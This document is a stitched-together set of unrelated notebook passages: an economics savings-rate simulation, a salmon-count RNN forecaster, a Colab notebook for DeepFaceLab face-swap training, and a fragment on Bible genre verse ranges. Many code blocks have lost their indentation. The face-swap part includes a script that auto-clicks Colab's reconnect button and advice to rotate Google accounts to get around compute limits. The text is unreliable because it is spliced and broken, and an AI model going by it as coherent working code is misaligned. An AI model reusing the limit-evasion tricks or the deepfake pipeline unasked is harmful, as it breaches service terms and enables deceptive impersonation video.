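print(len(quarters_to_plot), len(trimmed))  # 165 165
```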
We've calculated the path of the national saving rate as we wanted. All that's left is to graph the results!
```
plt.ylabel('Natl Savings Rate')
plt.xlabel('Quarters Since Economic Reforms')
plt.plot(quarters_to_plot,NatlSavingsRates[0],label=str(PermShkVarMultipliers[0]) + ' x variance')
plt.plot(quarters_to_plot,NatlSavingsRates[1],label=str(PermShkVarMultipliers[1]) + ' x variance')
plt.plot(quarters_to_plot,NatlSavingsRates[2],label=str(PermShkVarMultipliers[2]) + ' x variance')
plt.plot(quarters_to_plot,NatlSavingsRates[3],label=str(PermShkVarMultipliers[3]) + ' x variance')
plt.plot(quarters_to_plot,NatlSavingsRates[4],label=str(PermShkVarMultipliers[4]) + ' x variance')
plt.legend(bbox_to_anchor=(0., 1.02, 1., .102), loc=3,
ncol=2, mode="expand", borderaxespad=0.) #put the legend on top
plt.show()
```
The figure shows that, if the rate of growth increases the way Chinese growth did, but is not accompanied by any change in the degree of uncertainty, the saving rate declines drastically, from an initial (calibrated) value of about 0.1 (ten percent) to close to zero. For this model to have any hope of predicting an increase in the saving rate, it is clear that the increase in uncertainty that accompanies the increase in growth will have to be substantial.
The red line shows that a mere doubling of uncertainty from its baseline value is not enough: The steady state saving rate is still below its slow-growth value.
When we assume that the degree of uncertainty quadruples, the model does finally predict that the new steady-state saving rate will be higher than before, but not much higher, and not remotely approaching 25 percent.
Only when the degree of uncertainty increases by a factor of 8 is the model capable of producing a new equilibrium saving rate in the ballpark of the Chinese value.
But this is getting close to a point where the model starts to break down (for both numerical and conceptual reasons), as shown by the erratic path of the saving rate when we multiply the initial variance by 11.
We do not have historical data on the magnitude of permanent income shocks in China in the pre-1978 period; it seems implausible that the degree of uncertainty could have increased by such a large amount, but in the absence of good data it is hard to know for sure.
What the experiment does demonstrate, though, is that it is _not_ the case that "it is easy to explain anything by invoking some plausible but unmeasurable change in uncertainty." Substantial differences in the degree of permanent (or highly persistent) income uncertainty across countries, across periods, and across people have been measured in many papers, and those differences could in principle be compared to differences in saving rates to get a firmer fix on the quantitative importance of the "precautionary saving" explanation in the Chinese context.
<h1> Simple Single Layer RNN with Monthly dataset</h1>
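The training data below is framed as a supervised sliding-window problem: each input is a window of 6 consecutive monthly counts, and the target is the following month's count. A minimal sketch of that windowing on a hypothetical toy series (not the salmon data):

```python
import numpy as np

def make_windows(series, lookback=6):
    """Turn a 1-D series into (window, next-value) training pairs."""
    x, y = [], []
    for i in range(lookback, len(series)):
        x.append(series[i - lookback:i])  # the 6 preceding values
        y.append(series[i])               # the value to predict
    return np.array(x), np.array(y)

toy = np.arange(10, dtype=np.float32)  # 0, 1, ..., 9
x, y = make_windows(toy)
print(x.shape, y.shape)  # (4, 6) (4,)
print(x[0], y[0])        # [0. 1. 2. 3. 4. 5.] 6.0
```

The `create_train_test` function in the cell below does the same thing with the normalized monthly counts, which is why its loops start at index 6.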
```
import os
import numpy as np
import math
import pandas as pd
import seaborn as sns
import tensorflow as tf
import matplotlib.pyplot as plt
from keras.optimizers import SGD
from keras.models import Sequential
from keras.layers import Dense, LSTM, Dropout, GRU, SimpleRNN
#"/Users/ismaelcastro/Documents/Computer Science/CS Classes/CS230/project/data.csv"
from sklearn.model_selection import train_test_split
from sklearn.metrics import accuracy_score
from sklearn.preprocessing import MinMaxScaler
from sklearn.metrics import mean_absolute_error
from sklearn.metrics import mean_squared_error
plt.style.use('fivethirtyeight')
# salmon_data = pd.read_csv(r"/Users/ismaelcastro/Documents/Computer Science/CS Classes/CS230/project/data.csv")
# salmon_data.head()
# salmon_copy = salmon_data # Create a copy for us to work with
def load_data(pathname):
salmon_data = pd.read_csv(pathname)
salmon_data.head()
salmon_copy = salmon_data # Create a copy for us to work with
salmon_copy.rename(columns = {"mo": "month", "da" : "day", "fc" : "king"},
inplace = True)
salmon_copy['date']=pd.to_datetime(salmon_copy[['year','month','day']])
# print(salmon_copy)
king_data = salmon_copy.filter(["date","king"], axis=1)
# print(king_data)
king_greater = king_data['date'].apply(pd.Timestamp) >= pd.Timestamp('01/01/1939')
greater_than = king_data[king_greater]
king_all = greater_than[greater_than['date'].apply(pd.Timestamp) <= pd.Timestamp('12/31/2020')]
king_all_copy = king_all
king_all_copy = king_all_copy.reset_index()
king_all_copy = king_all_copy.drop('index', axis=1)
return king_all_copy, king_data
chris_path = '/Users/chrisshell/Desktop/Stanford/SalmonData/Use Data/passBonCS.csv'
ismael_path = '/Users/ismaelcastro/Documents/Computer Science/CS Classes/CS230/project/data.csv'
abdul_path = '/Users/abdul/Downloads/SalmonNet/data.csv'
king_all_copy, king_data= load_data(chris_path)
print(king_all_copy)
data_copy = king_all_copy
data_copy['date']
data_copy.set_index('date', inplace=True)
data_copy.index = pd.to_datetime(data_copy.index)
data_copy = data_copy.resample('1M').sum()
data_copy
print(data_copy)
data_copy.shape
data_copy.reset_index(inplace=True)
data_copy = data_copy.rename(columns = {'index':'date'})
print(data_copy)
def create_train_test(king_all):
king_training_parse = king_all['date'].apply(pd.Timestamp) <= pd.Timestamp('12/31/2015')
king_training = king_all[king_training_parse]
king_training = king_training.reset_index()
king_training = king_training.drop('index', axis=1)
king_test_parse = king_all['date'].apply(pd.Timestamp) > pd.Timestamp('12/31/2015')
king_test = king_all[king_test_parse]
king_test = king_test.reset_index()
king_test = king_test.drop('index', axis=1)
print(king_test.shape)
# Normalizing Data
king_training[king_training["king"] < 0] = 0
# print('max val king_train:')
print(max(king_training['king']))
king_test[king_test["king"] < 0] = 0
# print('max val king_test:')
print(max(king_test['king']))
king_train_pre = king_training["king"].to_frame()
# print(king_train_norm)
king_test_pre = king_test["king"].to_frame()
scaler = MinMaxScaler(feature_range=(0, 1))
king_train_norm = scaler.fit_transform(king_train_pre)
king_test_norm = scaler.fit_transform(king_test_pre)
print('king_test_norm')
print(king_test_norm.shape)
print('king_train_norm')
print(king_train_norm.shape)
#king_train_norm = (king_training["king"] - np.min(king_training["king"])) / (np.max(king_training["king"]) - np.min(king_training["king"]))
#print(type(king_train_norm))
#king_train_norm = king_train_norm.to_frame()
x_train = []
y_train = []
x_test = []
y_test = []
y_test_not_norm = []
y_train_not_norm = []
# Todo: Experiment with input size of input (ex. 30 days)
for i in range(6,924): # 30
x_train.append(king_train_norm[i-6:i])
y_train.append(king_train_norm[i])
for i in range(6, 60):
x_test.append(king_test_norm[i-6:i])
y_test.append(king_test_norm[i])
# make y_test_not_norm
for i in range(6, 60):
y_test_not_norm.append(king_test['king'][i])
for i in range(6,924): # 30
y_train_not_norm.append(king_training['king'][i])
return x_train, y_train, x_test, y_test, scaler, y_test_not_norm, y_train_not_norm
x_train, y_train, x_test, y_test, scaler, y_test_not_norm, y_train_not_norm = create_train_test(data_copy)
x_train = np.array(x_train)
x_test = np.array(x_test)
x_train = np.reshape(x_train, (x_train.shape[0],x_train.shape[1],1)).astype(np.float32)
x_test = np.reshape(x_test, (x_test.shape[0],x_test.shape[1],1))
y_train = np.array(y_train)
y_test = np.array(y_test)
y_test_not_norm = np.array(y_test_not_norm)
print(y_test.shape)
y_test_not_norm = y_test_not_norm.reshape((y_test_not_norm.shape[0], 1))
print(y_test_not_norm.shape)
y_train_not_norm = np.array(y_train_not_norm)
y_train_not_norm = y_train_not_norm.reshape((y_train_not_norm.shape[0], 1))
print(y_train_not_norm.shape)
print(y_train.shape)
def plot_predictions(test,predicted):
plt.plot(test, color='red',label='Real Chinook Count')
plt.plot(predicted, color='blue',label='Predicted Chinook Count')
plt.title('Chinook Population Prediction')
plt.xlabel('Time')
plt.ylabel('Chinook Count')
plt.legend()
plt.show()
def plot_loss(history):
plt.plot(history.history['loss'])
plt.title('model loss')
plt.ylabel('loss')
plt.xlabel('epoch')
plt.show()
def return_rmse(test, predicted):
rmse = math.sqrt(mean_squared_error(test, predicted))
print("The root mean squared error is {}.".format(rmse))
def month_to_year(month_preds):
month_preds = month_preds[5:]
print(len(month_preds))
year_preds = []
for i in range(12, len(month_preds), 12):
salmon_count = np.sum(month_preds[i - 12:i])
year_preds.append(salmon_count)
year_preds = pd.DataFrame(year_preds, columns = ["Count"])
return year_preds
def create_single_layer_rnn_model(x_train, y_train, x_test, y_test, scaler):
'''
create single layer rnn model trained on x_train and y_train
and make predictions on the x_test data
'''
# create a model
model = Sequential()
model.add(SimpleRNN(32, return_sequences=True))
model.add(SimpleRNN(32, return_sequences=True))
model.add(SimpleRNN(32, return_sequences=True))
model.add(SimpleRNN(1))
model.add(Dense(1))
model.compile(optimizer='adam', loss='mean_squared_error')
# fit the RNN model
history = model.fit(x_train, y_train, epochs=1000, batch_size=64)
print("predicting")
# Finalizing predictions
RNN_train_preds = model.predict(x_train)
RNN_test_preds = model.predict(x_test)
#Descale
RNN_train_preds = scaler.inverse_transform(RNN_train_preds)
y_train = scaler.inverse_transform(y_train)
RNN_test_preds = scaler.inverse_transform(RNN_test_preds)
RNN_test_preds = RNN_test_preds.astype(np.int64)
y_test = scaler.inverse_transform(y_test)
# RNN_salmon_count = (RNN_preds * (np.max(king_training["king"]) - np.min(king_training["king"])) + np.min(king_training["king"])).astype(np.int64)
# why are we normalizing the test and train set, then un-normalizing? (maybe this can cause
# problems in the sense that we are not comparing our preds to the proper y values)
return model, RNN_train_preds, RNN_test_preds, history, y_train, y_test
model, RNN_train_preds, RNN_test_preds, history_RNN, y_train, y_test = create_single_layer_rnn_model(x_train, y_train, x_test, y_test, scaler)
# plot single_layer_rnn_model
plot_predictions(y_train, RNN_train_preds)
return_rmse(y_train, RNN_train_preds)
print(RNN_train_preds.shape)
plot_predictions(y_test, RNN_test_preds)
return_rmse(y_test, RNN_test_preds)
plot_loss(history_RNN)
# global var for baseline
y_test_year = month_to_year(y_test)
len(y_test)
len(y_test_year)
y_test_year = month_to_year(y_test)
bs_chris_path = '/Users/chrisshell/Desktop/Stanford/SalmonData/Use Data/Forecast Data Update.csv'
bs_ismael_path = '/Users/ismaelcastro/Documents/Computer Science/CS Classes/CS230/project/forecast_data_17_20.csv'
bs_abdul_path = '/Users/abdul/Downloads/SalmonNet/Forecast Data Update.csv'
baseline_data = pd.read_csv(bs_chris_path)
traditional = pd.DataFrame(baseline_data["Count"])
print(traditional)
y_test_year = y_test_year.astype(np.int64)
print(y_test_year)
# print(GRU_test_year)
RNN_test_year = month_to_year(RNN_test_preds)
RNN_test_year
# test RMSE with baseline and RNN
return_rmse(y_test_year, traditional)
return_rmse(y_test_year, RNN_test_year)
```
# Welcome to DFL-Colab!
This is an adapted version of the DFL for Google Colab.
# Overview
* Extractor works in full functionality.
* Training can work without preview.
* Merger works in full functionality.
* You can import/export workspace with your Google Drive.
* Import/export and other workspace manipulations can be done in the "Manage workspace" block
* A Google Colab machine is active for up to 12 hours. DFL-Colab makes a backup of your workspace in training mode.
* Google does not like long-term heavy computation. Therefore, for training more than two sessions in a row, use two Google accounts. It is recommended to split your training across two accounts, but you can use one Google Drive account to store your workspace.
## Prevent random disconnects
This cell runs JS code to automatically reconnect to the runtime.
```
import IPython
from google.colab import output
display(IPython.display.Javascript('''
function ClickConnect(){
btn = document.querySelector("colab-connect-button")
if (btn != null){
console.log("Click colab-connect-button");
btn.click()
}
btn = document.getElementById('ok')
if (btn != null){
console.log("Click reconnect");
btn.click()
}
}
setInterval(ClickConnect,60000)
'''))
print("Done.")
```
## Check GPU
* Google Colab can provide you with one of these Tesla graphics cards: K80, T4, P4 or P100
* Here you can check which GPU model you got before using DeepFaceLab
```
!nvidia-smi
```
## Install or update DeepFaceLab
* Install or update DeepFaceLab directly from GitHub
* Requirements are installed automatically
* Automatically sets timer to prevent random disconnects
* The "Download FFHQ" option downloads the high-quality FFHQ dataset instead of CelebA. FFHQ takes up more space, so it will take longer to download. It is recommended to enable this option if you are pretraining.
```
#@title Install or update DeepFaceLab from Github
Mode = "install" #@param ["install", "update"]
Download_FFHQ = False #@param {type:"boolean"}
pretrain_link = "https://github.com/chervonij/DFL-Colab/releases/download/"
pretrain_link = pretrain_link+"pretrain_GenericFFHQ/pretrain_FFHQ.zip" if Download_FFHQ else pretrain_link+"pretrain-CelebA/pretrain_CelebA.zip"
from pathlib import Path
if (Mode == "install"):
!git clone https://github.com/iperov/DeepFaceLab.git
%cd "/content/DeepFaceLab"
#!git checkout 9ad9728b4021d1dff62905cce03e2157d0c0868d
%cd "/content"
# fix linux warning
# /usr/lib/python3.6/multiprocessing/semaphore_tracker.py:143: UserWarning: semaphore_tracker: There appear to be 1 leaked semaphores to clean up at shutdown
fin = open("/usr/lib/python3.6/multiprocessing/semaphore_tracker.py", "rt")
data = fin.read()
data = data.replace('if cache:', 'if False:')
fin.close()
fin = open("/usr/lib/python3.6/multiprocessing/semaphore_tracker.py", "wt")
fin.write(data)
fin.close()
else:
%cd /content/DeepFaceLab
!git pull
!pip uninstall -y tensorflow
!pip install -r /content/DeepFaceLab/requirements-colab.txt
!pip install --upgrade scikit-image
!apt-get install cuda-10-0
if not Path("/content/pretrain").exists():
print("Downloading Pretrain faceset ... ")
!wget -q --no-check-certificate -r $pretrain_link -O /content/pretrain_faceset.zip
!mkdir /content/pretrain
!unzip -q /content/pretrain_faceset.zip -d /content/pretrain/
!rm /content/pretrain_faceset.zip
if not Path("/content/pretrain_Q96").exists():
print("Downloading Q96 pretrained model ...")
!wget -q --no-check-certificate -r 'https://github.com/chervonij/DFL-Colab/releases/download/Q96_model_pretrained/Q96_model_pretrained.zip' -O /content/pretrain_Q96.zip
!mkdir /content/pretrain_Q96
!unzip -q /content/pretrain_Q96.zip -d /content/pretrain_Q96/
!rm /content/pretrain_Q96.zip
if not Path("/content/workspace").exists():
!mkdir /content/workspace; mkdir /content/workspace/data_src; mkdir /content/workspace/data_src/aligned; mkdir /content/workspace/data_dst; mkdir /content/workspace/data_dst/aligned; mkdir /content/workspace/model
import IPython
from google.colab import output
display(IPython.display.Javascript('''
function ClickConnect(){
btn = document.querySelector("colab-connect-button")
if (btn != null){
console.log("Click colab-connect-button");
btn.click()
}
btn = document.getElementById('ok')
if (btn != null){
console.log("Click reconnect");
btn.click()
}
}
setInterval(ClickConnect,60000)
'''))
print("\nDone!")
```
## Manage workspace
* You can import/export the workspace or individual data, such as model files, with Google Drive
* Also, you can use HFS (HTTP File Server) to import/export your workspace directly from your computer
* You can clear the whole workspace or delete parts of it
```
#@title Import from Drive
Mode = "workspace" #@param ["workspace", "data_src", "data_dst", "data_src aligned", "data_dst aligned", "models"]
Archive_name = "workspace.zip" #@param {type:"string"}
#Mount Google Drive as folder
from google.colab import drive
drive.mount('/content/drive')
def zip_and_copy(path, mode):
unzip_cmd=" -q "+Archive_name
%cd $path
copy_cmd = "/content/drive/My\ Drive/"+Archive_name+" "+path
!cp $copy_cmd
!unzip $unzip_cmd
!rm $Archive_name
if Mode == "workspace":
zip_and_copy("/content", "workspace")
elif Mode == "data_src":
zip_and_copy("/content/workspace", "data_src")
elif Mode == "data_dst":
zip_and_copy("/content/workspace", "data_dst")
elif Mode == "data_src aligned":
zip_and_copy("/content/workspace/data_src", "aligned")
elif Mode == "data_dst aligned":
zip_and_copy("/content/workspace/data_dst", "aligned")
elif Mode == "models":
zip_and_copy("/content/workspace", "model")
print("Done!")
#@title Export to Drive { form-width: "30%" }
Mode = "workspace" #@param ["workspace", "data_src", "data_dst", "data_src aligned", "data_dst aligned", "merged", "merged_mask", "models", "result video", "result_mask video"]
Archive_name = "workspace.zip" #@param {type:"string"}
#Mount Google Drive as folder
from google.colab import drive
drive.mount('/content/drive')
def zip_and_copy(path, mode):
zip_cmd="-0 -r -q "+Archive_name+" "
%cd $path
zip_cmd+=mode
!zip $zip_cmd
copy_cmd = " "+Archive_name+" /content/drive/My\ Drive/"
!cp $copy_cmd
!rm $Archive_name
if Mode == "workspace":
zip_and_copy("/content", "workspace")
elif Mode == "data_src":
zip_and_copy("/content/workspace", "data_src")
elif Mode == "data_dst":
zip_and_copy("/content/workspace", "data_dst")
elif Mode == "data_src aligned":
zip_and_copy("/content/workspace/data_src", "aligned")
elif Mode == "data_dst aligned":
zip_and_copy("/content/workspace/data_dst", "aligned")
elif Mode == "merged":
zip_and_copy("/content/workspace/data_dst", "merged")
elif Mode == "merged_mask":
zip_and_copy("/content/workspace/data_dst", "merged_mask")
elif Mode == "models":
zip_and_copy("/content/workspace", "model")
elif Mode == "result video":
!cp /content/workspace/result.mp4 /content/drive/My\ Drive/
elif Mode == "result_mask video":
!cp /content/workspace/result_mask.mp4 /content/drive/My\ Drive/
print("Done!")
#@title Import from URL{ form-width: "30%", display-mode: "form" }
URL = "http://" #@param {type:"string"}
Mode = "unzip to content" #@param ["unzip to content", "unzip to content/workspace", "unzip to content/workspace/data_src", "unzip to content/workspace/data_src/aligned", "unzip to content/workspace/data_dst", "unzip to content/workspace/data_dst/aligned", "unzip to content/workspace/model", "download to content/workspace"]
import urllib.request
from pathlib import Path
def unzip(zip_path, dest_path):
unzip_cmd = " unzip -q " + zip_path + " -d "+dest_path
!$unzip_cmd
rm_cmd = "rm "+dest_path + url_path.name
!$rm_cmd
print("Unzipped!")
if Mode == "unzip to content":
dest_path = "/content/"
elif Mode == "unzip to content/workspace":
dest_path = "/content/workspace/"
elif Mode == "unzip to content/workspace/data_src":
dest_path = "/content/workspace/data_src/"
elif Mode == "unzip to content/workspace/data_src/aligned":
dest_path = "/content/workspace/data_src/aligned/"
elif Mode == "unzip to content/workspace/data_dst":
dest_path = "/content/workspace/data_dst/"
elif Mode == "unzip to content/workspace/data_dst/aligned":
dest_path = "/content/workspace/data_dst/aligned/"
elif Mode == "unzip to content/workspace/model":
dest_path = "/content/workspace/model/"
elif Mode == "download to content/workspace":
dest_path = "/content/workspace/"
if not Path("/content/workspace").exists():
cmd = "mkdir /content/workspace; mkdir /content/workspace/data_src; mkdir /content/workspace/data_src/aligned; mkdir /content/workspace/data_dst; mkdir /content/workspace/data_dst/aligned; mkdir /content/workspace/model"
!$cmd
url_path = Path(URL)
urllib.request.urlretrieve ( URL, dest_path + url_path.name )
if (url_path.suffix == ".zip") and (Mode!="download to content/workspace"):
unzip(dest_path + url_path.name, dest_path)
print("Done!")
#@title Export to URL
URL = "http://" #@param {type:"string"}
Mode = "upload workspace" #@param ["upload workspace", "upload data_src", "upload data_dst", "upload data_src aligned", "upload data_dst aligned", "upload merged", "upload model", "upload result video"]
cmd_zip = "zip -0 -r -q "
def run_cmd(zip_path, curl_url):
cmd_zip = "zip -0 -r -q "+zip_path
cmd_curl = "curl --silent -F "+curl_url+" -D out.txt > /dev/null"
!$cmd_zip
!$cmd_curl
if Mode == "upload workspace":
%cd "/content"
run_cmd("workspace.zip workspace/","'data=@/content/workspace.zip' "+URL)
elif Mode == "upload data_src":
%cd "/content/workspace"
run_cmd("data_src.zip data_src/", "'data=@/content/workspace/data_src.zip' "+URL)
elif Mode == "upload data_dst":
%cd "/content/workspace"
run_cmd("data_dst.zip data_dst/", "'data=@/content/workspace/data_dst.zip' "+URL)
elif Mode == "upload data_src aligned":
%cd "/content/workspace"
run_cmd("data_src_aligned.zip data_src/aligned", "'data=@/content/workspace/data_src_aligned.zip' "+URL )
elif Mode == "upload data_dst aligned":
%cd "/content/workspace"
run_cmd("data_dst_aligned.zip data_dst/aligned/", "'data=@/content/workspace/data_dst_aligned.zip' "+URL)
elif Mode == "upload merged":
%cd "/content/workspace/data_dst"
run_cmd("merged.zip merged/","'data=@/content/workspace/data_dst/merged.zip' "+URL )
elif Mode == "upload model":
%cd "/content/workspace"
run_cmd("model.zip model/", "'data=@/content/workspace/model.zip' "+URL)
elif Mode == "upload result video":
%cd "/content/workspace"
run_cmd("result.zip result.mp4", "'data=@/content/workspace/result.zip' "+URL)
!rm *.zip
%cd "/content"
print("Done!")
#@title Delete and recreate
Mode = "Delete and recreate workspace" #@param ["Delete and recreate workspace", "Delete models", "Delete data_src", "Delete data_src aligned", "Delete data_src video", "Delete data_dst", "Delete data_dst aligned", "Delete merged frames"]
%cd "/content"
if Mode == "Delete and recreate workspace":
cmd = "rm -r /content/workspace ; mkdir /content/workspace; mkdir /content/workspace/data_src; mkdir /content/workspace/data_src/aligned; mkdir /content/workspace/data_dst; mkdir /content/workspace/data_dst/aligned; mkdir /content/workspace/model"
elif Mode == "Delete models":
cmd = "rm -r /content/workspace/model/*"
elif Mode == "Delete data_src":
cmd = "rm /content/workspace/data_src/*.png || rm -r /content/workspace/data_src/*.jpg"
elif Mode == "Delete data_src aligned":
cmd = "rm -r /content/workspace/data_src/aligned/*"
elif Mode == "Delete data_src video":
cmd = "rm -r /content/workspace/data_src.*"
elif Mode == "Delete data_dst":
cmd = "rm /content/workspace/data_dst/*.png || rm /content/workspace/data_dst/*.jpg"
elif Mode == "Delete data_dst aligned":
cmd = "rm -r /content/workspace/data_dst/aligned/*"
elif Mode == "Delete merged frames":
cmd = "rm -r /content/workspace/data_dst/merged; rm -r /content/workspace/data_dst/merged_mask"
!$cmd
print("Done!")
```
## Extract, sorting and faceset tools
* Extract frames for SRC or DST video.
* Denoise SRC or DST video. The "Factor" param sets the intensity of denoising.
* Detect and align faces. If you need, you can get frames with debug landmarks.
* Export workspace to Google Drive after extract and sort it manually (In "Manage Workspace" block)
* You can enhance your facesets with DFL FacesetEnhancer.
* Resize faceset to your model resolution. Since Colab doesn't have a powerful CPU, resizing samples during training increases iteration time. Resizing the faceset beforehand reduces iteration time by about 2x. Don't forget to keep the original faceset saved on your PC.
* Pack or unpack facesets with DFL packing tool.
* Apply or remove trained XSeg model to the extracted faces.
* The Generic XSeg model is recommended for automatic segmentation.
```
#@title Extract frames
Video = "data_src" #@param ["data_src", "data_dst"]
%cd "/content"
cmd = "DeepFaceLab/main.py videoed extract-video"
if Video == "data_dst":
cmd+= " --input-file workspace/data_dst.* --output-dir workspace/data_dst/"
else:
cmd+= " --input-file workspace/data_src.* --output-dir workspace/data_src/"
!python $cmd
#@title Denoise frames
Data = "data_src" #@param ["data_src", "data_dst"]
Factor = 1 #@param {type:"slider", min:1, max:20, step:1}
cmd = "DeepFaceLab/main.py videoed denoise-image-sequence --input-dir workspace/"+Data+" --factor "+str(Factor)
%cd "/content"
!python $cmd
#@title Detect faces
Data = "data_src" #@param ["data_src", "data_dst"]
Detector = "S3FD" #@param ["S3FD", "S3FD (whole face)"]
Debug = False #@param {type:"boolean"}
detect_type = "s3fd"
dbg = " --output-debug" if Debug else " --no-output-debug"
folder = "workspace/"+Data
folder_aligned = folder+"/aligned"
cmd = "DeepFaceLab/main.py extract --input-dir "+folder+" --output-dir "+folder_aligned
cmd+=" --detector "+detect_type+" --force-gpu-idxs 0"+dbg
if "whole face" in Detector:
cmd+=" --face-type whole_face"
%cd "/content"
!python $cmd
#@title Sort aligned
Data = "data_src" #@param ["data_src", "data_dst"]
sort_type = "hist" #@param ["blur", "motion-blur", "face-yaw", "face-pitch", "face-source-rect-size", "hist", "hist-dissim", "brightness", "hue", "black", "origname", "oneface", "final-by-blur", "final-by-size", "absdiff"]
cmd = "DeepFaceLab/main.py sort --input-dir workspace/"+Data+"/aligned --by "+sort_type
%cd "/content"
!python $cmd
#@title Faceset Enhancer
Data = "data_src" #@param ["data_src", "data_dst"]
data_path = "/content/workspace/"+Data+"/aligned"
cmd = "/content/DeepFaceLab/main.py facesettool enhance --input-dir "+data_path
!python $cmd
#@title Resize faceset
Data = "data_src" #@param ["data_src", "data_dst"]
cmd = "/content/DeepFaceLab/main.py facesettool resize --input-dir /content/workspace/" + \
f"{Data}/aligned"
!python $cmd
#@title Pack/Unpack aligned faceset
Folder = "data_src" #@param ["data_src", "data_dst"]
Mode = "unpack" #@param ["pack", "unpack"]
cmd = "/content/DeepFaceLab/main.py util --input-dir /content/workspace/" + \
f"{Folder}/aligned --{Mode}-faceset"
!python $cmd
#@title Apply or remove XSeg mask to the faces
Mode = "Apply mask" #@param ["Apply mask", "Remove mask"]
Data = "data_src" #@param ["data_src", "data_dst"]
GenericXSeg = True #@param {type:"boolean"}
from pathlib import Path
mode_arg = 'apply' if Mode == "Apply mask" else 'remove'
if GenericXSeg and not Path('/content/GenericXSeg').exists():
print('Downloading Generic XSeg model ... ')
xseg_link = 'https://github.com/chervonij/DFL-Colab/releases/download/GenericXSeg/GenericXSeg.zip'
!mkdir /content/GenericXSeg
!wget -q --no-check-certificate -r $xseg_link -O /content/GenericXSeg.zip
!unzip -q /content/GenericXSeg.zip -d /content/GenericXSeg/
!rm /content/GenericXSeg.zip
main_path = '/content/DeepFaceLab/main.py'
data_path = f'/content/workspace/{Data}/aligned'
model_path = '/content/workspace/model' if not GenericXSeg else '/content/GenericXSeg'
cmd = f'{main_path} xseg {mode_arg} --input-dir {data_path} '
cmd += f'--model-dir {model_path}' if mode_arg == 'apply' else ''
!python $cmd
```
## Train model
* Choose your model type; SAEHD is recommended for everyone
* Set model options on output field
* You can view the preview manually: go to the model folder in the file manager and double-click the preview.jpg file
* Your workspace will be archived and uploaded to the mounted Drive 11 hours after the session starts
* If you select "Backup_every_hour" option, your workspace will be backed up every hour.
* Also, you can export your workspace manually in "Manage workspace" block
* The "Silent_Start" option automatically starts training with the best GPU and the last used model.
```
#@title Training
Model = "SAEHD" #@param ["SAEHD", "AMP", "Quick96", "XSeg"]
Backup_every_hour = True #@param {type:"boolean"}
Silent_Start = True #@param {type:"boolean"}
%cd "/content"
#Mount Google Drive as folder
from google.colab import drive
drive.mount('/content/drive')
import psutil, os, time
p = psutil.Process(os.getpid())
uptime = time.time() - p.create_time()
if (Backup_every_hour):
    if not os.path.exists('workspace.zip'):
        print("Creating workspace archive ...")
        !zip -0 -r -q workspace.zip workspace
        print("Archive created!")
    else:
        print("Archive exists!")
if (Backup_every_hour):
    print("Time to end session: "+str(round((43200-uptime)/3600))+" hours")
    backup_time = str(3600)
    backup_cmd = " --execute-program -"+backup_time+" \"import os; os.system('zip -0 -r -q workspace.zip workspace/model'); os.system('cp /content/workspace.zip /content/drive/My\ Drive/'); print('Backed up!') \""
elif (round(39600-uptime) > 0):
    print("Time to backup: "+str(round((39600-uptime)/3600))+" hours")
    backup_time = str(round(39600-uptime))
    backup_cmd = " --execute-program "+backup_time+" \"import os; os.system('zip -0 -r -q workspace.zip workspace'); os.system('cp /content/workspace.zip /content/drive/My\ Drive/'); print('Backed up!') \""
else:
    print("Session expires in less than an hour.")
    backup_cmd = ""
cmd = "DeepFaceLab/main.py train --training-data-src-dir workspace/data_src/aligned --training-data-dst-dir workspace/data_dst/aligned --pretraining-data-dir pretrain --model-dir workspace/model --model "+Model
if Model == "Quick96":
    cmd+= " --pretrained-model-dir pretrain_Q96"
if Silent_Start:
    cmd+= " --silent-start"
if (backup_cmd != ""):
    train_cmd = (cmd+backup_cmd)
else:
    train_cmd = (cmd)
!python $train_cmd
```
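The backup timing above can be condensed into a small sketch. The 12-hour session cap (43200 s) and the 11-hour backup mark (39600 s) are taken from the constants in the cell; `backup_schedule` is a hypothetical helper written for illustration, not part of DeepFaceLab:

```python
# Hypothetical helper mirroring the backup-timing logic of the training cell.
SESSION_SECONDS = 43200   # 12-hour Colab session, as assumed in the cell above
BACKUP_SECONDS = 39600    # one-off backup scheduled at the 11-hour mark

def backup_schedule(uptime_seconds, hourly=False):
    """Return (mode, delay_seconds): 'hourly', 'once', or 'none'."""
    if hourly:
        return ('hourly', 3600)          # back up every hour
    remaining = round(BACKUP_SECONDS - uptime_seconds)
    if remaining > 0:
        return ('once', remaining)       # one backup just before session end
    return ('none', 0)                   # too late to schedule a backup

print(backup_schedule(0, hourly=True))   # ('hourly', 3600)
print(backup_schedule(36000))            # ('once', 3600)
print(backup_schedule(40000))            # ('none', 0)
```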
## Merge frames
```
#@title Merge
Model = "SAEHD" #@param ["SAEHD", "AMP", "Quick96" ]
cmd = "DeepFaceLab/main.py merge --input-dir workspace/data_dst --output-dir workspace/data_dst/merged --output-mask-dir workspace/data_dst/merged_mask --aligned-dir workspace/data_dst/aligned --model-dir workspace/model --model "+Model
%cd "/content"
!python $cmd
#@title Get result video
Mode = "result video" #@param ["result video", "result_mask video"]
Copy_to_Drive = True #@param {type:"boolean"}
if Mode == "result video":
    !python DeepFaceLab/main.py videoed video-from-sequence --input-dir workspace/data_dst/merged --output-file workspace/result.mp4 --reference-file workspace/data_dst.mp4 --include-audio
    if Copy_to_Drive:
        !cp /content/workspace/result.mp4 /content/drive/My\ Drive/
elif Mode == "result_mask video":
    !python DeepFaceLab/main.py videoed video-from-sequence --input-dir workspace/data_dst/merged_mask --output-file workspace/result_mask.mp4 --reference-file workspace/data_dst.mp4
    if Copy_to_Drive:
        !cp /content/workspace/result_mask.mp4 /content/drive/My\ Drive/
```
# Convert verse ranges of genres to TF verse node features
```
import collections
import pandas as pd
from tf.fabric import Fabric
from tf.compose import modify
from tf.app import use
A = use('bhsa', hoist=globals())
genre_ranges = pd.read_csv('genre_ranges.csv')
genre_ranges
```
# Compile data & sanity checks
```
# check book values
genre_ranges.book.unique()
# check genre values
genre_ranges.genre.unique()
# check book name alignment with BHSA english names
for book in genre_ranges.book.unique():
    bhsa_node = T.nodeFromSection((book,))
    if not bhsa_node:
        raise Exception(book)
def verse_node_range(start, end, tf_api):
    """Generate a list of verse nodes for a given range of reference tuples.
    Note that start and end are both inclusive bounds.
    Args:
        start: 3-tuple of (book, n_ch, n_vs)
        end: 3-tuple of (book, n_ch, n_vs)
    Returns:
        list of nodes
    """
    start_node = tf_api.T.nodeFromSection(start)
    end_node = tf_api.T.nodeFromSection(end)
    nodes = [start_node]
    while nodes[-1] < end_node:
        nodes.append(tf_api.L.n(nodes[-1],'verse')[0])
    return nodes
# check for missing verses
# or double-counted verses
verse2genre = {} # will be used for TF export
verse2count = collections.Counter()
for book, startch, startvs, endch, endvs, genre in genre_ranges.values:
    start = (book, startch, startvs)
    end = (book, endch, endvs)
